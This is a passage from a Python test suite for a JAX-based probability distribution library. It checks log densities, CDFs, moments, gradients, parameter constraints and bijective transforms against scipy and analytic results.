if isinstance(params[0], dist.Distribution):
# new api
loc, scale, low, high = (
params[0].loc,
params[0].scale,
params[1],
params[2],
)
else:
# old api
loc, scale, low, high = params
if low is None:
low = -np.inf
if high is None:
high = np.inf
sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)
expected = sp_dist.logpdf(samples) - jnp.log(
sp_dist.cdf(high) - sp_dist.cdf(low)
)
assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)
return
pytest.skip("no corresponding scipy distn.")
if _is_batched_multivariate(jax_dist):
pytest.skip("batching not allowed in multivariate distns.")
if jax_dist.event_shape and prepend_shape:
# >>> d = sp.dirichlet([1.1, 1.1])
# >>> samples = d.rvs(size=(2,))
# >>> d.logpdf(samples)
# ValueError: The input vector 'x' must lie within the normal simplex ...
pytest.skip("batched samples cannot be scored by multivariate distributions.")
sp_dist = sp_dist(*params)
try:
expected = sp_dist.logpdf(samples)
except AttributeError:
expected = sp_dist.logpmf(samples)
except ValueError as e:
# precision issue: jnp.sum(x / jnp.sum(x)) = 0.99999994 != 1
if "The input vector 'x' must lie within the normal simplex." in str(e):
samples = jax.device_get(samples).astype("float64")
samples = samples / samples.sum(axis=-1, keepdims=True)
expected = sp_dist.logpdf(samples)
else:
raise e
assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)
def test_mixture_log_prob():
gmm = dist.MixtureSameFamily(
dist.Categorical(logits=np.zeros(2)), dist.Normal(0, 1).expand([2])
)
actual = gmm.log_prob(0.0)
expected = dist.Normal(0, 1).log_prob(0.0)
assert_allclose(actual, expected)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params",
# TODO: add more complete pattern for Discrete.cdf
CONTINUOUS + [T(dist.Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))],
)
@pytest.mark.filterwarnings("ignore:overflow encountered:RuntimeWarning")
def test_cdf_and_icdf(jax_dist, sp_dist, params):
d = jax_dist(*params)
if d.event_dim > 0:
pytest.skip("skip testing cdf/icdf methods of multivariate distributions")
samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))
quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())
try:
rtol = 2e-3 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-5
if d.shape() == () and not d.is_discrete:
assert_allclose(
jax.vmap(jax.grad(d.cdf))(samples),
jnp.exp(d.log_prob(samples)),
atol=1e-5,
rtol=rtol,
)
assert_allclose(
jax.vmap(jax.grad(d.icdf))(quantiles),
jnp.exp(-d.log_prob(d.icdf(quantiles))),
atol=1e-5,
rtol=rtol,
)
assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-5, rtol=1e-5)
assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-5, rtol=rtol)
except NotImplementedError:
pass
# test against scipy
if not sp_dist:
pytest.skip("no corresponding scipy distn.")
sp_dist = sp_dist(*params)
try:
actual_cdf = d.cdf(samples)
expected_cdf = sp_dist.cdf(samples)
assert_allclose(actual_cdf, expected_cdf, atol=1e-5, rtol=1e-5)
actual_icdf = d.icdf(quantiles)
expected_icdf = sp_dist.ppf(quantiles)
assert_allclose(actual_icdf, expected_icdf, atol=1e-4, rtol=1e-4)
except NotImplementedError:
pass
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS + DIRECTIONAL)
def test_gof(jax_dist, sp_dist, params):
if "Improper" in jax_dist.__name__:
pytest.skip("distribution has improper .log_prob()")
if "LKJ" in jax_dist.__name__:
pytest.xfail("incorrect submanifold scaling")
if jax_dist is dist.EulerMaruyama:
d = jax_dist(*params)
if d.event_dim > 1:
pytest.skip("EulerMaruyama skip test when event shape is non-trivial.")
num_samples = 10000
if "BetaProportion" in jax_dist.__name__:
num_samples = 20000
rng_key = random.PRNGKey(0)
d = jax_dist(*params)
samples = d.sample(key=rng_key, sample_shape=(num_samples,))
probs = np.exp(d.log_prob(samples))
dim = None
if jax_dist is dist.ProjectedNormal:
dim = samples.shape[-1] - 1
# Test each batch independently.
probs = probs.reshape(num_samples, -1)
samples = samples.reshape(probs.shape + d.event_shape)
if "Dirichlet" in jax_dist.__name__:
# The Dirichlet density is over all but one of the probs.
samples = samples[..., :-1]
for b in range(probs.shape[1]):
try:
gof = auto_goodness_of_fit(samples[:, b], probs[:, b], dim=dim)
except InvalidTest:
pytest.skip("expensive test")
else:
assert gof > TEST_FAILURE_RATE
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS + DISCRETE)
def test_independent_shape(jax_dist, sp_dist, params):
d = jax_dist(*params)
batch_shape, event_shape = d.batch_shape, d.event_shape
shape = batch_shape + event_shape
for i in range(len(batch_shape)):
indep = dist.Independent(d, reinterpreted_batch_ndims=i)
sample = indep.sample(random.PRNGKey(0))
event_boundary = len(shape) - len(event_shape) - i
assert indep.batch_shape == shape[:event_boundary]
assert indep.event_shape == shape[event_boundary:]
assert jnp.shape(indep.log_prob(sample)) == shape[:event_boundary]
def _tril_cholesky_to_tril_corr(x):
w = vec_to_tril_matrix(x, diagonal=-1)
diag = jnp.sqrt(1 - jnp.sum(w**2, axis=-1))
cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])
corr = jnp.matmul(cholesky, cholesky.T)
return matrix_to_tril_vec(corr, diagonal=-1)
@pytest.mark.parametrize("dimension", [2, 3, 5])
def test_log_prob_LKJCholesky_uniform(dimension):
# When concentration=1, the distribution of correlation matrices is uniform.
# We will test that fact here.
d = dist.LKJCholesky(dimension=dimension, concentration=1)
N = 5
corr_log_prob = []
for i in range(N):
sample = d.sample(random.PRNGKey(i))
log_prob = d.log_prob(sample)
sample_tril = matrix_to_tril_vec(sample, diagonal=-1)
cholesky_to_corr_jac = np.linalg.slogdet(
jax.jacobian(_tril_cholesky_to_tril_corr)(sample_tril)
)[1]
corr_log_prob.append(log_prob - cholesky_to_corr_jac)
corr_log_prob = np.array(corr_log_prob)
# test if they are constant
assert_allclose(
corr_log_prob,
jnp.broadcast_to(corr_log_prob[0], corr_log_prob.shape),
rtol=1e-6,
)
if dimension == 2:
# when concentration = 1, LKJ gives a uniform distribution over correlation matrix,
# hence for the case dimension = 2,
# density of a correlation matrix will be Uniform(-1, 1) = 0.5.
# In addition, jacobian of the transformation from cholesky -> corr is 1 (hence its
# log value is 0) because the off-diagonal lower triangular element does not change
# in the transform.
# So target_log_prob = log(0.5)
assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-6)
@pytest.mark.parametrize("dimension", [2, 3, 5])
@pytest.mark.parametrize("concentration", [0.6, 2.2])
def test_log_prob_LKJCholesky(dimension, concentration):
# We will test against the fact that LKJCorrCholesky can be seen as a
# TransformedDistribution with base distribution is a distribution of partial
# correlations in C-vine method (modulo an affine transform to change domain from (0, 1)
# to (1, 0)) and transform is a signed stick-breaking process.
d = dist.LKJCholesky(dimension, concentration, sample_method="cvine")
beta_sample = d._beta.sample(random.PRNGKey(0))
beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))
partial_correlation = 2 * beta_sample - 1
affine_logdet = beta_sample.shape[-1] * jnp.log(2)
sample = signed_stick_breaking_tril(partial_correlation)
# compute signed stick breaking logdet
inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2 # noqa: E731
inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(partial_correlation)))
unconstrained = inv_tanh(partial_correlation)
corr_cholesky_logdet = biject_to(constraints.corr_cholesky).log_abs_det_jacobian(
unconstrained, sample
)
signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet
actual_log_prob = d.log_prob(sample)
expected_log_prob = beta_log_prob - affine_logdet - signed_stick_breaking_logdet
assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-5)
assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-6)
def test_zero_inflated_logits_probs_agree():
concentration = np.exp(np.random.normal(1))
rate = np.exp(np.random.normal(1))
d = dist.GammaPoisson(concentration, rate)
gate_logits = np.random.normal(0)
gate_probs = expit(gate_logits)
zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)
zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)
sample = np.random.randint(
0,
20,
(
1000,
100,
),
)
assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))
@pytest.mark.parametrize("rate", [0.1, 0.5, 0.9, 1.0, 1.1, 2.0, 10.0])
def test_ZIP_log_prob(rate):
# if gate is 0 ZIP is Poisson
zip_ = dist.ZeroInflatedPoisson(0.0, rate)
pois = dist.Poisson(rate)
s = zip_.sample(random.PRNGKey(0), (20,))
zip_prob = zip_.log_prob(s)
pois_prob = pois.log_prob(s)
assert_allclose(zip_prob, pois_prob, rtol=1e-6)
# if gate is 1 ZIP is Delta(0)
zip_ = dist.ZeroInflatedPoisson(1.0, rate)
delta = dist.Delta(0.0)
s = np.array([0.0, 1.0])
zip_prob = zip_.log_prob(s)
delta_prob = delta.log_prob(s)
assert_allclose(zip_prob, delta_prob, rtol=1e-6)
@pytest.mark.parametrize("total_count", [1, 2, 3, 10])
@pytest.mark.parametrize("shape", [(1,), (3, 1), (2, 3, 1)])
def test_beta_binomial_log_prob(total_count, shape):
concentration0 = np.exp(np.random.normal(size=shape))
concentration1 = np.exp(np.random.normal(size=shape))
value = jnp.arange(1 + total_count)
num_samples = 100000
probs = np.random.beta(concentration1, concentration0, size=(num_samples,) + shape)
log_probs = dist.Binomial(total_count, probs).log_prob(value)
expected = logsumexp(log_probs, 0) - jnp.log(num_samples)
actual = dist.BetaBinomial(concentration1, concentration0, total_count).log_prob(
value
)
assert_allclose(actual, expected, rtol=0.02)
@pytest.mark.parametrize("total_count", [1, 2, 3, 10])
@pytest.mark.parametrize("batch_shape", [(1,), (3, 1), (2, 3, 1)])
def test_dirichlet_multinomial_log_prob(total_count, batch_shape):
event_shape = (3,)
concentration = np.exp(np.random.normal(size=batch_shape + event_shape))
# test on one-hots
value = total_count * jnp.eye(event_shape[-1]).reshape(
event_shape + (1,) * len(batch_shape) + event_shape
)
num_samples = 100000
probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (num_samples, 1))
log_probs = dist.Multinomial(total_count, probs).log_prob(value)
expected = logsumexp(log_probs, 0) - jnp.log(num_samples)
actual = dist.DirichletMultinomial(concentration, total_count).log_prob(value)
assert_allclose(actual, expected, rtol=0.05)
@pytest.mark.parametrize("shape", [(1,), (3, 1), (2, 3, 1)])
def test_gamma_poisson_log_prob(shape):
gamma_conc = np.exp(np.random.normal(size=shape))
gamma_rate = np.exp(np.random.normal(size=shape))
value = jnp.arange(15)
num_samples = 300000
poisson_rate = np.random.gamma(
gamma_conc, 1 / gamma_rate, size=(num_samples,) + shape
)
log_probs = dist.Poisson(poisson_rate).log_prob(value)
expected = logsumexp(log_probs, 0) - jnp.log(num_samples)
actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)
assert_allclose(actual, expected, rtol=0.05)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_log_prob_gradient(jax_dist, sp_dist, params):
if jax_dist in [dist.LKJ, dist.LKJCholesky]:
pytest.skip("we have separated tests for LKJCholesky distribution")
if jax_dist is _ImproperWrapper:
pytest.skip("no param for ImproperUniform to test for log_prob gradient")
rng_key = random.PRNGKey(0)
value = jax_dist(*params).sample(rng_key)
def fn(*args):
return jnp.sum(jax_dist(*args).log_prob(value))
eps = 1e-3
for i in range(len(params)):
if jax_dist is dist.EulerMaruyama and i == 1:
# skip taking grad w.r.t. sde_fn
continue
if jax_dist is _SparseCAR and i == 3:
# skip taking grad w.r.t. adj_matrix
continue
if isinstance(
params[i], dist.Distribution
): # skip taking grad w.r.t. base_dist
continue
if params[i] is None or jnp.result_type(params[i]) in (jnp.int32, jnp.int64):
continue
actual_grad = jax.grad(fn, i)(*params)
args_lhs = [p if j != i else p - eps for j, p in enumerate(params)]
args_rhs = [p if j != i else p + eps for j, p in enumerate(params)]
fn_lhs = fn(*args_lhs)
fn_rhs = fn(*args_rhs)
# finite diff approximation
expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)
assert jnp.shape(actual_grad) == jnp.shape(params[i])
if i == 0 and jax_dist is dist.Delta:
# grad w.r.t. `value` of Delta distribution will be 0
# but numerical value will give nan (= inf - inf)
expected_grad = 0.0
assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01, atol=0.01)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_mean_var(jax_dist, sp_dist, params):
if jax_dist is _ImproperWrapper:
pytest.skip("Improper distribution does not has mean/var implemented")
if jax_dist is FoldedNormal:
pytest.skip("Folded distribution does not has mean/var implemented")
if jax_dist is dist.EulerMaruyama:
pytest.skip("EulerMaruyama distribution does not has mean/var implemented")
if jax_dist is dist.RelaxedBernoulliLogits:
pytest.skip("RelaxedBernoulli distribution does not has mean/var implemented")
if "SineSkewed" in jax_dist.__name__:
pytest.skip("Skewed Distribution are not symmetric about location.")
if jax_dist in (
_TruncatedNormal,
_TruncatedCauchy,
dist.LeftTruncatedDistribution,
dist.RightTruncatedDistribution,
dist.TwoSidedTruncatedDistribution,
):
pytest.skip("Truncated distributions do not has mean/var implemented")
if jax_dist is dist.ProjectedNormal:
pytest.skip("Mean is defined in submanifold")
n = (
20000
if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.SineBivariateVonMises]
else 200000
)
d_jax = jax_dist(*params)
k = random.PRNGKey(0)
samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)
# check with suitable scipy implementation if available
# XXX: VonMises is already tested below
if (
sp_dist
and not _is_batched_multivariate(d_jax)
and jax_dist
not in [dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]
):
d_sp = sp_dist(*params)
try:
sp_mean = d_sp.mean()
except TypeError: # mvn does not have .mean() method
sp_mean = d_sp.mean
# for multivariate distns try .cov first
if d_jax.event_shape:
try:
sp_var = jnp.diag(d_sp.cov())
except TypeError: # mvn does not have .cov() method
sp_var = jnp.diag(d_sp.cov)
except AttributeError:
sp_var = d_sp.var()
else:
sp_var = d_sp.var()
assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-7)
assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-7)
if jnp.all(jnp.isfinite(sp_mean)):
assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)
if jnp.all(jnp.isfinite(sp_var)):
assert_allclose(
jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2
)
elif jax_dist in [dist.LKJ, dist.LKJCholesky]:
if jax_dist is dist.LKJCholesky:
corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))
else:
corr_samples = samples
dimension, concentration, _ = params
# marginal of off-diagonal entries
marginal = dist.Beta(
concentration + 0.5 * (dimension - 2), concentration + 0.5 * (dimension - 2)
)
# scale statistics due to linear mapping
marginal_mean = 2 * marginal.mean - 1
marginal_std = 2 * jnp.sqrt(marginal.variance)
expected_mean = jnp.broadcast_to(
jnp.reshape(marginal_mean, jnp.shape(marginal_mean) + (1, 1)),
jnp.shape(marginal_mean) + d_jax.event_shape,
)
expected_std = jnp.broadcast_to(
jnp.reshape(marginal_std, jnp.shape(marginal_std) + (1, 1)),
jnp.shape(marginal_std) + d_jax.event_shape,
)
# diagonal elements of correlation matrices are 1
expected_mean = expected_mean * (1 - jnp.identity(dimension)) + jnp.identity(
dimension
)
expected_std = expected_std * (1 - jnp.identity(dimension))
assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol=0.01)
assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)
elif jax_dist in [dist.VonMises]:
# circular mean = sample mean
assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=1e-2)
# circular variance
x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)
expected_variance = 1 - jnp.sqrt(x**2 + y**2)
assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=1e-2)
elif jax_dist in [dist.SineBivariateVonMises]:
phi_loc = _circ_mean(samples[..., 0])
psi_loc = _circ_mean(samples[..., 1])
assert_allclose(
d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1), rtol=0.05, atol=1e-2
)
elif jax_dist in [dist.MatrixNormal]:
sample_shape = (200_000,)
# use X ~ MN(loc, U, V) then vec(X) ~ MVN(vec(loc), kron(V, U))
if len(d_jax.batch_shape) > 0:
axes = [len(sample_shape) + i for i in range(len(d_jax.batch_shape))]
axes = tuple(axes)
samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))
subshape = samples_re.shape[: len(axes)]
ixi = product(*[range(k) for k in subshape])
for ix in ixi:
# mean
def get_min_shape(ix, batch_shape):
return min(ix, tuple(map(lambda x: x - 1, batch_shape)))
ix_loc = get_min_shape(ix, d_jax.loc.shape[: len(ix)])
jnp.allclose(
jnp.mean(samples_re[ix], 0),
jnp.squeeze(d_jax.mean[ix_loc]),
rtol=0.5,
atol=1e-2,
)
# cov
samples_mvn = jnp.squeeze(samples_re[ix]).reshape(
sample_shape + (-1,), order="F"
)
ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[: len(ix)])
ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[: len(ix)])
scale_tril = my_kron(
d_jax.scale_tril_column[ix_col],
d_jax.scale_tril_row[ix_row],
)
sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))
jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)
else: # unbatched
# mean
jnp.allclose(
jnp.mean(samples, 0),
jnp.squeeze(d_jax.mean),
rtol=0.5,
atol=1e-2,
)
# cov
samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,), order="F")
scale_tril = my_kron(
jnp.squeeze(d_jax.scale_tril_column), jnp.squeeze(d_jax.scale_tril_row)
)
sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))
jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=1e-2)
else:
if jnp.all(jnp.isfinite(d_jax.mean)):
assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)
if isinstance(d_jax, dist.CAR):
pytest.skip("CAR distribution does not have `variance` implemented.")
if isinstance(d_jax, dist.Gompertz):
pytest.skip("Gompertz distribution does not have `variance` implemented.")
if jnp.all(jnp.isfinite(d_jax.variance)):
assert_allclose(
jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2
)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
@pytest.mark.parametrize("prepend_shape", [(), (2,), (2, 3)])
def test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):
if jax_dist in (
_TruncatedNormal,
_TruncatedCauchy,
_GaussianMixture,
_Gaussian2DMixture,
_GeneralMixture,
_General2DMixture,
):
pytest.skip(f"{jax_dist.__name__} is a function, not a class")
dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]
valid_params, oob_params = list(params), list(params)
key = random.PRNGKey(1)
dependent_constraint = False
for i in range(len(params)):
if (
jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky)
and dist_args[i] != "concentration"
):
continue
if "SineSkewed" in jax_dist.__name__ and dist_args[i] != "skewness":
continue
if jax_dist is dist.EulerMaruyama and dist_args[i] != "t":
continue
if (
jax_dist is dist.TwoSidedTruncatedDistribution
and dist_args[i] == "base_dist"
):
continue
if jax_dist is dist.GaussianRandomWalk and dist_args[i] == "num_steps":
continue
if (
jax_dist is dist.SineBivariateVonMises
and dist_args[i] == "weighted_correlation"
):
continue
if params[i] is None:
oob_params[i] = None
valid_params[i] = None
continue
constraint = jax_dist.arg_constraints[dist_args[i]]
if isinstance(constraint, constraints._Dependent):
dependent_constraint = True
break
key, key_gen = random.split(key)
oob_params[i] = gen_values_outside_bounds(
constraint, jnp.shape(params[i]), key_gen
)
valid_params[i] = gen_values_within_bounds(
constraint, jnp.shape(params[i]), key_gen
)
if jax_dist is dist.MultivariateStudentT:
# As mean is only defined for df > 1 & we instantiate
# scipy.stats.multivariate_t with same mean as jax_dist
# we need to ensure this is defined, so force df >= 1
valid_params[0] += 1
if jax_dist is dist.LogUniform:
# scipy.stats.loguniform take parameter a and b
# which is a > 0 and b > a.
# gen_values_within_bounds() generates just
# a > 0 and b > 0. Then, make b = a + b.
valid_params[1] += valid_params[0]
assert jax_dist(*oob_params)
# Invalid parameter values throw ValueError
if not dependent_constraint and (
jax_dist is not _ImproperWrapper and "SineSkewed" not in jax_dist.__name__
):
with pytest.raises(ValueError):
jax_dist(*oob_params, validate_args=True)
with pytest.raises(ValueError):
# test error raised under jit omnistaging
oob_params = jax.device_get(oob_params)
def dist_gen_fn():
d = jax_dist(*oob_params, validate_args=True)
return d
jax.jit(dist_gen_fn)()
d = jax_dist(*valid_params, validate_args=True)
# Test agreement of log density evaluation on randomly generated samples
# with scipy's implementation when available.
if (
sp_dist
and not _is_batched_multivariate(d)
and not (d.event_shape and prepend_shape)
):
valid_samples = gen_values_within_bounds(
d.support, size=prepend_shape + d.batch_shape + d.event_shape
)
try:
expected = sp_dist(*valid_params).logpdf(valid_samples)
except AttributeError:
expected = sp_dist(*valid_params).logpmf(valid_samples)
assert_allclose(d.log_prob(valid_samples), expected, atol=1e-5, rtol=1e-5)
# Out of support samples throw ValueError
oob_samples = gen_values_outside_bounds(
d.support, size=prepend_shape + d.batch_shape + d.event_shape
)
with pytest.warns(UserWarning, match="Out-of-support"):
d.log_prob(oob_samples)
with pytest.warns(UserWarning, match="Out-of-support"):
# test warning work under jit omnistaging
oob_samples = jax.device_get(oob_samples)
valid_params = jax.device_get(valid_params)
def log_prob_fn():
d = jax_dist(*valid_params, validate_args=True)
return d.log_prob(oob_samples)
jax.jit(log_prob_fn)()
def test_omnistaging_invalid_param():
def f(x):
return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)
with pytest.raises(ValueError, match="got invalid"):
jax.jit(f)(0)
def test_omnistaging_invalid_sample():
def f(x):
return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)
with pytest.warns(UserWarning, match="Out-of-support"):
jax.jit(f)(0)
def test_categorical_log_prob_grad():
data = jnp.repeat(jnp.arange(3), 10)
def f(x):
return (
dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(data).sum()
)
def g(x):
return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data).sum()
x = 0.5
fx, grad_fx = jax.value_and_grad(f)(x)
gx, grad_gx = jax.value_and_grad(g)(x)
assert_allclose(fx, gx, rtol=1e-6)
assert_allclose(grad_fx, grad_gx, atol=1e-4)
def test_beta_proportion_invalid_mean():
with dist.distribution.validation_enabled(), pytest.raises(
ValueError, match=r"^BetaProportion distribution got invalid mean parameter\.$"
):
dist.BetaProportion(1.0, 1.0)
########################################
# Tests for constraints and transforms #
########################################
@pytest.mark.parametrize(
"constraint, x, expected",
[
(constraints.boolean, np.array([True, False]), np.array([True, True])),
(constraints.boolean, np.array([1, 1]), np.array([True, True])),
(constraints.boolean, np.array([-1, 1]), np.array([False, True])),
(
constraints.corr_cholesky,
np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),
np.array([True, False]),
), # NB: not lower_triangular
(
constraints.corr_cholesky,
np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),
np.array([False, False]),
), # NB: not positive_diagonal & not unit_norm_row
(
constraints.corr_matrix,
np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),
np.array([True, False]),
), # NB: not lower_triangular
(
constraints.corr_matrix,
np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),
np.array([False, False]),
), # NB: not unit diagonal
(constraints.greater_than(1), 3, True),
(
constraints.greater_than(1),
np.array([-1, 1, 5]),
np.array([False, False, True]),
),
(constraints.integer_interval(-3, 5), 0, True),
(
constraints.integer_interval(-3, 5),
np.array([-5, -3, 0, 1.1, 5, 7]),
np.array([False, True, True, False, True, False]),
),
(constraints.interval(-3, 5), 0, True),
(
constraints.interval(-3, 5),
np.array([-5, -3, 0, 5, 7]),
np.array([False, True, True, True, False]),
),
(constraints.less_than(1), -2, True),
(
constraints.less_than(1),
np.array([-1, 1, 5]),
np.array([True, False, False]),
),
(constraints.lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True),
(
constraints.lower_cholesky,
np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),
np.array([False, False]),
),
(constraints.nonnegative_integer, 3, True),
(
constraints.nonnegative_integer,
np.array([-1.0, 0.0, 5.0]),
np.array([False, True, True]),
),
(constraints.positive, 3, True),
(constraints.positive, np.array([-1, 0, 5]), np.array([False, False, True])),
(constraints.positive_definite, np.array([[1.0, 0.3], [0.3, 1.0]]), True),
(
constraints.positive_definite,
np.array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]),
np.array([False, False]),
),
(constraints.positive_integer, 3, True),
(
constraints.positive_integer,
np.array([-1.0, 0.0, 5.0]),
np.array([False, False, True]),
),
(constraints.real, -1, True),
(
constraints.real,
np.array([np.inf, -np.inf, np.nan, np.pi]),
np.array([False, False, False, True]),
),
(constraints.simplex, np.array([0.1, 0.3, 0.6]), True),
(
constraints.simplex,
np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),
np.array([True, False, False]),
),
(constraints.softplus_positive, 3, True),
(
constraints.softplus_positive,
np.array([-1, 0, 5]),
np.array([False, False, True]),
),
(
constraints.softplus_lower_cholesky,
np.array([[1.0, 0.0], [-2.0, 0.1]]),
True,
),
(
constraints.softplus_lower_cholesky,
np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),
np.array([False, False]),
),
(constraints.unit_interval, 0.1, True),
(
constraints.unit_interval,
np.array([-5, 0, 0.5, 1, 7]),
np.array([False, True, True, True, False]),
),
(
constraints.sphere,
np.array([[1, 0, 0], [0.5, 0.5, 0]]),
np.array([True, False]),
),
(
constraints.open_interval(0.0, 1.0),
np.array([-5, 0, 0.5, 1, 7]),
np.array([False, False, True, False, False]),
),
],
)
def test_constraints(constraint, x, expected):
v = constraint.feasible_like(x)
if jnp.result_type(v) == "float32" or jnp.result_type(v) == "float64":
assert not constraint.is_discrete
assert_array_equal(constraint(x), expected)
feasible_value = constraint.feasible_like(x)
assert jnp.shape(feasible_value) == jnp.shape(x)
assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected), True))
try:
inverse = biject_to(constraint).inv(feasible_value)
except NotImplementedError:
pass
else:
assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-7)
@pytest.mark.parametrize(
"constraint",
[
constraints.corr_cholesky,
constraints.corr_matrix,
constraints.greater_than(2),
constraints.interval(-3, 5),
constraints.l1_ball,
constraints.less_than(1),
constraints.lower_cholesky,
constraints.scaled_unit_lower_cholesky,
constraints.ordered_vector,
constraints.positive,
constraints.positive_definite,
constraints.positive_ordered_vector,
constraints.real,
constraints.real_vector,
constraints.simplex,
constraints.softplus_positive,
constraints.softplus_lower_cholesky,
constraints.unit_interval,
constraints.open_interval(0.0, 1.0),
],
ids=lambda x: x.__class__,
)
@pytest.mark.parametrize("shape", [(), (1,), (3,), (6,), (3, 1), (1, 3), (5, 3)])
def test_biject_to(constraint, shape):
transform = biject_to(constraint)
event_dim = transform.domain.event_dim
if isinstance(constraint, constraints._Interval):
assert transform.codomain.upper_bound == constraint.upper_bound
assert transform.codomain.lower_bound == constraint.lower_bound
elif isinstance(constraint, constraints._GreaterThan):
assert transform.codomain.lower_bound == constraint.lower_bound
elif isinstance(constraint, constraints._LessThan):
assert transform.codomain.upper_bound == constraint.upper_bound
if len(shape) < event_dim:
return
rng_key = random.PRNGKey(0)
x = random.normal(rng_key, shape)
y = transform(x)
assert transform.forward_shape(x.shape) == y.shape
assert transform.inverse_shape(y.shape) == x.shape
# test inv work for NaN arrays:
x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))
assert x_nan.shape == x.shape
# test codomain
batch_shape = shape if event_dim == 0 else shape[:-1]
assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=jnp.bool_))
# test inv
z = transform.inv(y)
assert_allclose(x, z, atol=1e-5, rtol=1e-5)
# test domain, currently all is constraints.real or constraints.real_vector
assert_array_equal(transform.domain(z), jnp.ones(batch_shape))
# test log_abs_det_jacobian
actual = transform.log_abs_det_jacobian(x, y)
assert jnp.shape(actual) == batch_shape
if len(shape) == event_dim:
if constraint is constraints.simplex:
expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]
inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)[:, :-1])[1]
elif constraint in [
constraints.real_vector,
constraints.ordered_vector,
constraints.positive_ordered_vector,
constraints.l1_ball,
]:
expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]
elif constraint in [constraints.corr_cholesky, constraints.corr_matrix]:
vec_transform = lambda x: matrix_to_tril_vec( # noqa: E731
transform(x), diagonal=-1
)
y_tril = matrix_to_tril_vec(y, diagonal=-1)
def inv_vec_transform(y):
matrix = vec_to_tril_matrix(y, diagonal=-1)
if constraint is constraints.corr_matrix:
# fill the upper triangular part
matrix = (
